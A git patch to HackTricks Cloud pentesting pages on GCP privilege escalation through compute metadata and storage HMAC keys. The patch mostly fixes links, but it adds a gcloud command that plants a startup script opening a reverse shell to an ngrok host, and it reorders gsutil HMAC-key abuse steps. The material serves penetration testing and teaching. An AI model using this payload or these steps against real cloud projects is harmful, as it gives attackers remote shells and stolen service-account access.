From 6743320e7eb15f26064a0b937b6a6122fab50760 Mon Sep 17 00:00:00 2001 From: CPol Date: Sun, 16 Jun 2024 21:21:45 +0000 Subject: [PATCH] GITBOOK-627: No subject --- .../gcp-compute-privesc/README.md | 24 ++++++++++++---- .../gcp-storage-privesc.md | 5 +++- .../gcp-compute-instances-enum/README.md | 28 ++++++++++++------- 3 files changed, 41 insertions(+), 16 deletions(-) diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md index 5150daca21..cb52d1225f 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -22,6 +22,10 @@ For more information about Compute and VPC (netowork) in GCP check: [gcp-compute-instances-enum](../../gcp-services/gcp-compute-instances-enum/) {% endcontent-ref %} +{% hint style="danger" %} +Note that to perform all the privilege escalation atacks that require to modify the metadata of the instance (like adding new users and SSH keys) it's **needed that you have `actAs` permissions over the SA attached to the instance**, even if the SA is already attached! +{% endhint %} + ### `compute.projects.setCommonInstanceMetadata` With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with.\ @@ -36,6 +40,16 @@ For more information about how to exploit this permission check: [gcp-add-custom-ssh-metadata.md](gcp-add-custom-ssh-metadata.md) {% endcontent-ref %} +You could aslo perform this attack by adding new startup-script and rebooting the instance: + +```bash +gcloud compute instances add-metadata my-vm-instance \ + --metadata startup-script='#!/bin/bash +bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/18347 0>&1 &' + +gcloud compute instances reset my-vm-instance +``` + ### `compute.instances.setMetadata` This permission gives the **same privileges as the previous permission** but over a specific instances instead to a whole project. The **same exploits and limitations as for the previous section applies**. @@ -88,12 +102,12 @@ Automated tooling such as [patchy](https://github.com/rek7/patchy) exists to det ### Bypass Access Scopes -Following this link you find some [**ideas to try to bypass access scopes**](../../../gcp-security/gcp-privilege-escalation/). +Following this link you find some [**ideas to try to bypass access scopes**](../). ### Local Privilege Escalation in GCP Compute instance -{% content-ref url="../../../gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md" %} -[gcp-local-privilege-escalation-ssh-pivoting.md](../../../gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md) +{% content-ref url="../gcp-local-privilege-escalation-ssh-pivoting.md" %} +[gcp-local-privilege-escalation-ssh-pivoting.md](../gcp-local-privilege-escalation-ssh-pivoting.md) {% endcontent-ref %} ## References @@ -109,7 +123,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md index 45292fe588..50fda85702 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md @@ -50,11 +50,14 @@ Cloud Storage's "interoperability" feature, designed for **cross-cloud interacti gsutil hmac create # Configure gsutil to use it -gsutil config -a gcloud config set pass_credentials_to_gsutil false +gsutil config -a # Use it gsutil ls gs://[BUCKET_NAME] + +# Restore +gcloud config set pass_credentials_to_gsutil true ``` Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py). diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md b/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md index ef014137dc..d519e5962d 100644 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md +++ b/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -97,8 +97,8 @@ gcloud compute disks get-iam-policy For more information about how to **SSH** or **modify the metadata** of an instance to **escalate privileges,** check this page: -{% content-ref url="../../../gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md" %} -[gcp-local-privilege-escalation-ssh-pivoting.md](../../../gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md) +{% content-ref url="../../gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md" %} +[gcp-local-privilege-escalation-ssh-pivoting.md](../../gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md) {% endcontent-ref %} ### Privilege Escalation @@ -111,20 +111,20 @@ In the following page, you can check how to **abuse compute permissions to escal ### Unauthenticated Enum -{% content-ref url="../../../gcp-security/gcp-unaunthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md" %} -[gcp-compute-unauthenticated-enum.md](../../../gcp-security/gcp-unaunthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md) +{% content-ref url="../../gcp-unaunthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md" %} +[gcp-compute-unauthenticated-enum.md](../../gcp-unaunthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md) {% endcontent-ref %} ### Post Exploitation -{% content-ref url="../../../gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md" %} -[gcp-compute-post-exploitation.md](../../../gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md) +{% content-ref url="../../gcp-post-exploitation/gcp-compute-post-exploitation.md" %} +[gcp-compute-post-exploitation.md](../../gcp-post-exploitation/gcp-compute-post-exploitation.md) {% endcontent-ref %} ### Persistence -{% content-ref url="../../../gcp-security/gcp-persistence/gcp-compute-persistence.md" %} -[gcp-compute-persistence.md](../../../gcp-security/gcp-persistence/gcp-compute-persistence.md) +{% content-ref url="../../gcp-persistence/gcp-compute-persistence.md" %} +[gcp-compute-persistence.md](../../gcp-persistence/gcp-compute-persistence.md) {% endcontent-ref %} ## Serial Console Logs @@ -141,6 +141,14 @@ You can use the following [gcloud command](https://cloud.google.com/sdk/gcloud/r gcloud compute instances get-serial-port-output ``` +## Startup Scripts output + +It's possible to see the **output of the statup scripts** from the VM executing: + +```bash +sudo journalctl -u google-startup-scripts.service +``` + ## OS Configuration Manager You can use the OS configuration management service to **deploy, query, and maintain consistent configurations** (desired state and software) for your VM instance (VM). On Compute Engine, you must use [guest policies](https://cloud.google.com/compute/docs/os-config-management#guest-policy) to maintain consistent software configurations on a VM. @@ -246,7 +254,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.